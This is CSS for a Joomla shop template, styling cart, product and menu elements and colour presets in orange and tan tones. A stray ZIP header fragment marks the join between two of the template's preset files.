.vmCartModule #cd-lateral-nav .cd-navigation {
  color: #000000;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a {
  color: #f14833 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a:hover {
  color: #ca230e !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .show-cart {
  color: #fff;
}
.quantity {
  background-color: rgba(241,72,51,0.8);
}
.cd-customization .add-to-cart {
  background-color: #f14833;
}
.cd-customization .add-to-cart:hover {
  background-color: #ef2a12;
}
.no-touch .cd-customization .add-to-cart:hover {
  background-color: #ef2a12;
}
.productdetails-view .vm-product-details-inner .product-price .vm-price-desc+span {
  color: #f14833;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 {
  color: #555;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 >i {
  color: #f57b6c;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  color: #fff;
  background: rgba(85,85,85,0.3);
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:after {
  background: #f14833;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  color: #fff;
  text-shadow: 1px 1px 0px rgba(85,85,85,0.08);
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.08);
}
.productdetails-view .icons a {
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.1);
}
.productdetails-view .icons a:hover {
  color: #fff;
  background: rgba(241,72,51,0.8);
}
.productdetails-view .products-desc-tab .nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #e2e2e2;
  border-left: 1px solid #e2e2e2;
  box-shadow: 0 -1px 0px #f14833;
  border-top: 1px solid rgba(241,72,51,0.8);
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  color: #f6887b;
}
.empty_cart >i.pe >span {
  color: #fff;
  background-color: rgba(241,72,51,0.35);
}
#fancybox-wrap #fancybox-content .continue_link,
#fancybox-wrap #fancybox-content .showcart {
  color: #fff;
  background-color: #f14833;
}
.cart-view input[value="Logout"],
.cart-view input[name="changeShopper"],
.cart-view input[value="Search in shop"] {
  background-color: #f14833;
}
.cart-view input[value="Logout"]:hover,
.cart-view input[name="changeShopper"]:hover,
.cart-view input[value="Search in shop"]:hover {
  background: #ef331b;
}
.cart-view fieldset.userdata #com-form-login-remember input {
  background-color: #f14833;
}
.cart-view fieldset.userdata #com-form-login-remember input:hover {
  background-color: #e2270f;
}
.cart-view .billto-shipto a.details {
  background: #f14833;
}
.cart-view .billto-shipto a.details:hover {
  background: #e2270f;
}
.cart-view table.cart-summary tr th {
  background: #f14833;
  border: solid 1px #f14833;
}
.cart-view table.cart-summary input.details-button {
  background: #f14833;
}
.cart-view table.cart-summary .vm2-add_quantity_cart {
  background: #f14833;
}
.sectiontableentry1 td a.change-payment {
  color: #f47363;
}
.sectiontableentry1 td a.change-payment:hover {
  color: #f14833;
}
.vm-button-correct {
  background-color: #f14833;
}
.vm-button-correct:hover {
  background-color: #ef331b;
}
.vm-button {
  background-color: #f47363;
}
#com-form-login-remember input.default {
  background: #f14833;
}
#com-form-login-remember input.default:hover {
  background: #ef331b;
}
.control-buttons .vm-button-correct {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.control-buttons .vm-button-correct:hover,
.control-buttons .vm-button-correct:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #f14833;
  color: #f14833;
}
.control-buttons button.default {
  background: #f14833;
}
.control-buttons button.default:hover {
  background: #ef331b;
}
span.userfields_info {
  color: #f14833;
  border-bottom: 1px solid #f14833;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer {
  border: 1px solid rgba(128,128,128,0.2);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  color: #959595;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  border-left: 1px solid rgba(128,128,128,0.3);
  border-right: 1px solid rgba(128,128,128,0.3);
  background: rgba(255,255,255,0.9);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  color: #000000;
  border-bottom: 1px solid rgba(128,128,128,0.3);
}
.sp-module-content ul.VMmenu li div > a >.nmb_products {
  color: #000000;
}
.vm-flex-search input:focus {
  border: 1px solid #f14833;
}
.vm-flex-search input:focus + .vm-search-button >i {
  color: #f14833;
}
.vm-flex-search .vm-search-button >i {
  color: #f6887b;
}
.currency-selector-module button.btn >i,
.currency-selector-module input.btn >i {
  color: #555;
}
.currency-selector-module button.btn >i:hover,
.currency-selector-module input.btn >i:hover {
  color: #f14833;
}
.chzn-container-active .chzn-single {
  border: 1px solid #f14833 !important;
}
.chzn-container-active.chzn-with-drop .chzn-results li.highlighted {
  background: rgba(0,0,0,0.4);
}
.vm-price-box ins {
  color: #f14833;
}
.vm-menu .vm-title {
  border-top: 1px solid #f47363;
}
.vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #f14833;
}
header.color .vm-menu .vm-title {
  color: #262626;
  border-top: 1px solid rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li {
  box-shadow: 0 1px 0px rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #000000;
}
header.color .vm-menu ul.productdetails:last-child li {
  box-shadow: none;
}
.alert-notice {
  box-shadow: 0 0 0 1px rgba(85,85,85,0.1), 0 2px 3px rgba(85,85,85,0.07);
}
@keyframes fade-in {
  to {
    opacity: 1;
    fill: rgba(241,72,51,0.9);
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(85,85,85,0.7);
    stroke: rgba(85,85,85,0.7);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
    stroke-width: 5;
    stroke-dashoffset: 0;
    fill: rgba(241,72,51,0.85);
    stroke: #f14833;
  }
}
PK!N��@�@�flex/css/presets/preset6.cssnu&1i�.major_color_bckg-100 {
  background-color: #cc8b60;
}
.major_color_bckg-90 {
  background-color: rgba(204,139,96,0.9);
}
.major_color_bckg-80 {
  background-color: rgba(204,139,96,0.8);
}
.major_color_bckg-70 {
  background-color: rgba(204,139,96,0.7);
}
.major_color_bckg-60 {
  background-color: rgba(204,139,96,0.6);
}
.major_color_bckg-50 {
  background-color: rgba(204,139,96,0.5);
}
.major_color_bckg-40 {
  background-color: rgba(204,139,96,0.4);
}
.major_color_bckg-30 {
  background-color: rgba(204,139,96,0.3);
}
.major_color_bckg-20 {
  background-color: rgba(204,139,96,0.2);
}
.major_color_bckg-10 {
  background-color: rgba(204,139,96,0.1);
}
.black_bckg-90 {
  background-color: rgba(0,0,0,0.9);
}
.black_bckg-80 {
  background-color: rgba(0,0,0,0.8);
}
.black_bckg-70 {
  background-color: rgba(0,0,0,0.7);
}
.black_bckg-60 {
  background-color: rgba(0,0,0,0.6);
}
.black_bckg-50 {
  background-color: rgba(0,0,0,0.5);
}
.black_bckg-40 {
  background-color: rgba(0,0,0,0.4);
}
.black_bckg-30 {
  background-color: rgba(0,0,0,0.3);
}
.black_bckg-20 {
  background-color: rgba(0,0,0,0.2);
}
.black_bckg-10 {
  background-color: rgba(0,0,0,0.1);
}
.white_bckg-90 {
  background-color: rgba(255,255,255,0.9);
}
.white_bckg-80 {
  background-color: rgba(255,255,255,0.8);
}
.white_bckg-70 {
  background-color: rgba(255,255,255,0.7);
}
.white_bckg-60 {
  background-color: rgba(255,255,255,0.6);
}
.white_bckg-50 {
  background-color: rgba(255,255,255,0.5);
}
.white_bckg-40 {
  background-color: rgba(255,255,255,0.4);
}
.white_bckg-30 {
  background-color: rgba(255,255,255,0.3);
}
.white_bckg-20 {
  background-color: rgba(255,255,255,0.2);
}
.white_bckg-10 {
  background-color: rgba(255,255,255,0.1);
}
.black-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.5);
}
.black-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.4);
}
.black-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.3);
}
.black-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.2);
}
.black-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.1);
}
.white-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.5);
}
.white-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.4);
}
.white-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.3);
}
.white-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.2);
}
.white-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.1);
}
.major_color {
  color: #cc8b60 !important;
}
.white_color {
  color: #fff;
}
.text_color {
  color: #000000;
}
.major_color-lighten-10 {
  color: #d8a787;
}
.major_color-lighten-20 {
  color: #e5c3ad;
}
.major_color-lighten-30 {
  color: #f1e0d4;
}
.gray-shadow-50 {
  box-shadow: 0 0 50px rgba(85,85,85,0.5);
}
.gray-shadow-40 {
  box-shadow: 0 0 40px rgba(128,128,128,0.4);
}
.gray-shadow-30 {
  box-shadow: 0 0 30px rgba(128,128,128,0.3);
}
.gray-shadow-20 {
  box-shadow: 0 0 20px rgba(128,128,128,0.3);
}
.gray-shadow-10 {
  box-shadow: 0 0 10px rgba(128,128,128,0.3);
}
.transparent {
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent li.active a {
  color: #cc8b60;
  border-bottom: 2px solid #cc8b60;
}
#sp-header.onepage .sp-megamenu-parent li.active:first-child >a.page-scroll {
  color: #cc8b60;
  border-bottom: 2px solid #cc8b60;
}
#sp-header.onepage .sp-megamenu-parent ul li a {
  border-bottom-width: 0px !important;
  border-right: 2px solid transparent;
  border-radius: 0 !important;
}
#sp-header.onepage .sp-megamenu-parent ul li a:hover {
  color: #cc8b60;
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent ul li.active a {
  border-right: 2px solid #cc8b60;
}
#sp-header #sp-menu .sp-megamenu-parent >li.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent >li.sp-has-child.active>a {
  color: #d8a787;
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active:hover>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item a:hover {
  color: #fff;
  background-color: #cc8b60;
  background-color: rgba(204,139,96,0.8);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a:hover {
  background: transparent !important;
  border-bottom: 1px solid rgba(0,0,0,0.15);
  box-shadow: 0 1px 0px rgba(250,250,250,0.15);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a:hover {
  background: transparent;
}
#sp-header .top-search-wrapper .searchwrapper {
  box-shadow: 0 0 0 6px rgba(204,139,96,0.5);
}
#sp-header #cart-menu {
  padding: 0;
}
#sp-header #cart-menu #cd-menu-trigger .empty_basket,
#sp-header #cart-menu #cd-menu-trigger .items-added,
#sp-header #cart-menu .cd-cart .empty_basket,
#sp-header #cart-menu .cd-cart .items-added {
  background-color: #cc8b60;
}
#sp-header #cart-menu #cd-menu-trigger.menu-is-open >i,
#sp-header #cart-menu .cd-cart.menu-is-open >i {
  font-size: 30px;
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart >i {
  background-color: rgba(51,51,51,0.75);
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open .total_products,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open .total_products {
  right: 27px;
  font-size: 11px;
  line-height: 18px;
  height: 18px;
  width: 18px;
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner {
  background: rgba(204,139,96,0.85);
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item.current-item>a,
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item a:hover {
  background-color: #965930;
  background-color: rgba(0,0,0,0.25);
}
.overflow-hidden {
  overflow-x: hidden;
}
.sp-module ul.accordion-menu > li .offcanvas-menu-toggler .close-icon {
  color: #cc8b60;
}
.sp-module ul.accordion-menu li.current > a {
  color: #cc8b60;
}
.nav.menu li.current > a {
  color: #cc8b60;
}
.close-offcanvas:hover {
  border: 1px solid #cc8b60;
  color: #cc8b60;
}
.full-screen .offcanvas-menu,
.full-screen-off-canvas-ftop .offcanvas-menu {
  margin-bottom: 10vh;
}
.full-screen .offcanvas-menu .search input,
.full-screen-off-canvas-ftop .offcanvas-menu .search input {
  height: 44px;
}
.full-screen .offcanvas-menu .flex-search:before,
.full-screen-off-canvas-ftop .offcanvas-menu .flex-search:before {
  line-height: 44px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler {
  padding: 5px 15px;
  line-height: 18px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon {
  font-size: 16px;
}
.slide-top-menu .offcanvas-menu {
  margin-bottom: 10vh;
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.slide-top-menu .offcanvas-menu .separator,
.slide-top-menu .offcanvas-menu .nav-header {
  color: #b3b3b3;
}
.new-look .offcanvas-menu {
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.new-look .offcanvas-menu .sp-module ul >li .separator,
.new-look .offcanvas-menu .sp-module ul >li .nav-header {
  color: #999999;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:before {
  background: #cc8b60 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:after {
  background: #cc8b60 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:before {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:after {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:before {
  background: #cc8b60 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:after {
  background: #cc8b60 none repeat scroll 0 0;
}
a {
  color: #cc8b60;
}
a:hover {
  color: #bd6f3c;
}
.article-info >dt >i,
.article-info >dt >span.fa,
.article-info >dd >i,
.article-info >dd >span.fa {
  color: #d8a787;
}
.article-info >dt .voting-symbol span.star,
.article-info >dd .voting-symbol span.star {
  color: #d8a787;
}
.article-info >dt .sp-rating span.star:hover:before,
.article-info >dt .sp-rating span.star:hover ~ span.star:before,
.article-info >dd .sp-rating span.star:hover:before,
.article-info >dd .sp-rating span.star:hover ~ span.star:before {
  color: #c67d4d;
}
.article-info >dt .ajax-loader:before,
.article-info >dd .ajax-loader:before {
  color: #bd6f3c;
}
#offcanvas-toggler >i {
  color: #d8a787;
}
#offcanvas-toggler >i:hover {
  color: #cc8b60;
}
.sp-pre-loader {
  background: rgba(255,255,255,0.64);
}
.sp-pre-loader .sp-loader-clock {
  border: 3px solid #333333;
}
.sp-pre-loader .sp-loader-clock:after {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-clock:before {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-circle {
  border: 4px solid rgba(51,51,51,0.4);
}
.sp-pre-loader .sp-loader-circle:after {
  border-top-color: #333333;
}
.sp-pre-loader .loader-flip:after {
  background-color: rgba(51,51,51,0.8);
}
.sp-pre-loader .sp-loader-bubble-loop {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-bubble-loop:before {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .sp-loader-bubble-loop:after {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .circle-two > span,
.sp-pre-loader .circle-two > span:before,
.sp-pre-loader .circle-two > span:after {
  border: 2px solid #333333;
}
.sp-pre-loader .wave-two li {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-audio-wave {
  background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
}
.sp-pre-loader .sp-loader-with-logo .line {
  background: #333333;
}
.btn-primary,
.button,
.btn-readmore,
.sppb-btn-primary,
.vm-button-correct {
  border-color: #ca8558;
  background-color: #cc8b60;
  background-color: rgba(204,139,96,0.9);
  color: #fff;
  outline: 0;
}
.btn-primary:hover,
.btn-primary:focus,
.button:hover,
.button:focus,
.btn-readmore:hover,
.btn-readmore:focus,
.sppb-btn-primary:hover,
.sppb-btn-primary:focus,
.vm-button-correct:hover,
.vm-button-correct:focus {
  border-color: #a96436;
  background-color: #c78051;
  color: #fff;
}
.btn-primary.sppb-btn-outline,
.button.sppb-btn-outline,
.btn-readmore.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-outline,
.vm-button-correct.sppb-btn-outline {
  border: 2px solid #cc8b60;
  color: inherit;
  background-color: transparent;
}
.btn-primary.sppb-btn-round.focus,
.btn-primary.sppb-btn-round.active,
.btn-primary.sppb-btn-round:focus,
.btn-primary.sppb-btn-round:active,
.btn-primary.sppb-btn-outline:hover,
.btn-primary.sppb-btn-outline.focus,
.btn-primary.sppb-btn-outline.active,
.btn-primary.sppb-btn-outline:focus,
.btn-primary.sppb-btn-outline:active,
.btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.button.sppb-btn-round.focus,
.button.sppb-btn-round.active,
.button.sppb-btn-round:focus,
.button.sppb-btn-round:active,
.button.sppb-btn-outline:hover,
.button.sppb-btn-outline.focus,
.button.sppb-btn-outline.active,
.button.sppb-btn-outline:focus,
.button.sppb-btn-outline:active,
.button.open > .dropdown-toggle.sppb-btn-outline,
.btn-readmore.sppb-btn-round.focus,
.btn-readmore.sppb-btn-round.active,
.btn-readmore.sppb-btn-round:focus,
.btn-readmore.sppb-btn-round:active,
.btn-readmore.sppb-btn-outline:hover,
.btn-readmore.sppb-btn-outline.focus,
.btn-readmore.sppb-btn-outline.active,
.btn-readmore.sppb-btn-outline:focus,
.btn-readmore.sppb-btn-outline:active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-round.focus,
.sppb-btn-primary.sppb-btn-round.active,
.sppb-btn-primary.sppb-btn-round:focus,
.sppb-btn-primary.sppb-btn-round:active,
.sppb-btn-primary.sppb-btn-outline:hover,
.sppb-btn-primary.sppb-btn-outline.focus,
.sppb-btn-primary.sppb-btn-outline.active,
.sppb-btn-primary.sppb-btn-outline:focus,
.sppb-btn-primary.sppb-btn-outline:active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.vm-button-correct.sppb-btn-round.focus,
.vm-button-correct.sppb-btn-round.active,
.vm-button-correct.sppb-btn-round:focus,
.vm-button-correct.sppb-btn-round:active,
.vm-button-correct.sppb-btn-outline:hover,
.vm-button-correct.sppb-btn-outline.focus,
.vm-button-correct.sppb-btn-outline.active,
.vm-button-correct.sppb-btn-outline:focus,
.vm-button-correct.sppb-btn-outline:active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-outline {
  background-color: rgba(204,139,96,0.9) !important;
  border-color: rgba(0,0,0,0.2) !important;
  color: #fff;
  outline: 0;
}
.btn-primary.sppb-btn-3d,
.button.sppb-btn-3d,
.btn-readmore.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d {
  border-bottom-color: rgba(0,0,0,0.25);
}
.btn-primary.sppb-btn-3d:hover,
.btn-primary.sppb-btn-3d:focus,
.button.sppb-btn-3d:hover,
.button.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d:hover,
.btn-readmore.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d:hover,
.sppb-btn-primary.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d:hover,
.vm-button-correct.sppb-btn-3d:focus {
  background: rgba(204,139,96,0.95);
  border-bottom-color: rgba(0,0,0,0.3);
}
.btn-primary.sppb-btn-3d:focus,
.btn-primary.sppb-btn-3d.focus,
.btn-primary.sppb-btn-3d:active,
.btn-primary.sppb-btn-3d.active,
.btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.button.sppb-btn-3d:focus,
.button.sppb-btn-3d.focus,
.button.sppb-btn-3d:active,
.button.sppb-btn-3d.active,
.button.open > .dropdown-toggle.sppb-btn-3d,
.btn-readmore.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d.focus,
.btn-readmore.sppb-btn-3d:active,
.btn-readmore.sppb-btn-3d.active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d.focus,
.sppb-btn-primary.sppb-btn-3d:active,
.sppb-btn-primary.sppb-btn-3d.active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d.focus,
.vm-button-correct.sppb-btn-3d:active,
.vm-button-correct.sppb-btn-3d.active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-3d {
  background: #d29973;
}
.sppb-btn-default,
.btn.sppb-btn-default {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.sppb-btn-default:hover,
.sppb-btn-default:focus,
.btn.sppb-btn-default:hover,
.btn.sppb-btn-default:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #cc8b60;
  color: #cc8b60;
}
.sppb-btn-default.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline {
  border: 2px solid #666666;
  color: inherit;
  background-color: transparent;
}
.sppb-btn-default.sppb-btn-outline:hover,
.sppb-btn-default.sppb-btn-outline.focus,
.sppb-btn-default.sppb-btn-outline.active,
.sppb-btn-default.sppb-btn-outline:focus,
.sppb-btn-default.sppb-btn-outline:active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline:hover,
.btn.sppb-btn-default.sppb-btn-outline.focus,
.btn.sppb-btn-default.sppb-btn-outline.active,
.btn.sppb-btn-default.sppb-btn-outline:focus,
.btn.sppb-btn-default.sppb-btn-outline:active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline {
  background-color: transparent !important;
  color: #bd6f3c;
  border: 2px solid #cc8b60 !important;
  box-shadow: none;
}
.sppb-btn-default.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d {
  border-bottom-color: #666666;
}
.sppb-btn-default.sppb-btn-3d:hover,
.sppb-btn-default.sppb-btn-3d:focus,
.btn.sppb-btn-default.sppb-btn-3d:hover,
.btn.sppb-btn-default.sppb-btn-3d:focus {
  background-color: transparent;
  color: #bd6f3c;
  border-bottom-color: #cc8b60;
}
.sppb-btn-default.sppb-btn-3d:active,
.sppb-btn-default.sppb-btn-3d.active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d:active,
.btn.sppb-btn-default.sppb-btn-3d.active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom: 2px solid #cc8b60;
  background-color: transparent;
}
.btn-link,
.sppb-btn-link {
  color: #d8a787;
}
.btn-link:hover,
.btn-link:focus,
.sppb-btn-link:hover,
.sppb-btn-link:focus {
  color: #cc8b60;
  text-decoration: none;
}
.btn-readmore {
  color: #fff;
}
.btn-readmore:hover,
.btn-readmore:focus {
  color: #fff;
}
.btn-dark,
.sppb-btn-dark {
  color: #fff;
  border-color: #4d4d4d;
  background-color: rgba(51,51,51,0.72);
}
.btn-dark:hover,
.btn-dark:focus,
.sppb-btn-dark:hover,
.sppb-btn-dark:focus {
  color: #eee;
  border-color: #333;
  background-color: #424242;
  background-color: rgba(51,51,51,0.87);
}
.btn-dark.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline {
  border-color: #333;
}
.btn-dark.sppb-btn-outline:hover,
.btn-dark.sppb-btn-outline.focus,
.btn-dark.sppb-btn-outline.active,
.btn-dark.sppb-btn-outline:focus,
.btn-dark.sppb-btn-outline:active,
.btn-dark.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline:hover,
.sppb-btn-dark.sppb-btn-outline.focus,
.sppb-btn-dark.sppb-btn-outline.active,
.sppb-btn-dark.sppb-btn-outline:focus,
.sppb-btn-dark.sppb-btn-outline:active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-outline {
  color: #eee;
  border-color: #333;
  background-color: #535353;
  background-color: rgba(51,51,51,0.8);
}
.btn-dark.sppb-btn-3d,
.btn-dark.sppb-btn-3d:hover,
.btn-dark.sppb-btn-3d.focus,
.btn-dark.sppb-btn-3d:focus,
.btn-dark.sppb-btn-3d:active,
.btn-dark.sppb-btn-3d.active,
.btn-dark.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d:hover,
.sppb-btn-dark.sppb-btn-3d.focus,
.sppb-btn-dark.sppb-btn-3d:focus,
.sppb-btn-dark.sppb-btn-3d:active,
.sppb-btn-dark.sppb-btn-3d.active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #262626;
}
.btn-light,
.sppb-btn-light {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
  background-color: rgba(255,255,255,0.05);
}
.btn-light:hover,
.btn-light:focus,
.sppb-btn-light:hover,
.sppb-btn-light:focus {
  border-color: #fff;
  color: #fff;
  background-color: rgba(255,255,255,0.15);
}
.btn-light.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-outline:hover,
.btn-light.sppb-btn-outline.focus,
.btn-light.sppb-btn-outline:focus,
.btn-light.sppb-btn-outline:active,
.btn-light.sppb-btn-outline.active,
.btn-light.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline:hover,
.sppb-btn-light.sppb-btn-outline.focus,
.sppb-btn-light.sppb-btn-outline:focus,
.sppb-btn-light.sppb-btn-outline:active,
.sppb-btn-light.sppb-btn-outline.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #fff;
  color: #fff;
}
.btn-light.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d {
  border-bottom-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-3d:hover,
.btn-light.sppb-btn-3d.focus,
.btn-light.sppb-btn-3d:focus,
.btn-light.sppb-btn-3d:active,
.btn-light.sppb-btn-3d.active,
.btn-light.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d:hover,
.sppb-btn-light.sppb-btn-3d.focus,
.sppb-btn-light.sppb-btn-3d:focus,
.sppb-btn-light.sppb-btn-3d:active,
.sppb-btn-light.sppb-btn-3d.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #fff;
}
.btn-flex,
.sppb-btn-flex {
  color: #fff;
  border-color: #e5c3ad;
  background-color: rgba(255,255,255,0.25);
  box-shadow: 0 2px 5px rgba(0,0,0,0.15);
}
.btn-flex:hover,
.btn-flex:focus,
.sppb-btn-flex:hover,
.sppb-btn-flex:focus {
  border-color: #dfb59a;
  color: #fff;
  background-color: rgba(204,139,96,0.7);
}
.btn-flex.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline {
  color: #fff;
  border-color: #e5c3ad;
  background-color: rgba(255,255,255,0.25);
}
.btn-flex.sppb-btn-outline:hover,
.btn-flex.sppb-btn-outline.focus,
.btn-flex.sppb-btn-outline:focus,
.btn-flex.sppb-btn-outline:active,
.btn-flex.sppb-btn-outline.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline:hover,
.sppb-btn-flex.sppb-btn-outline.focus,
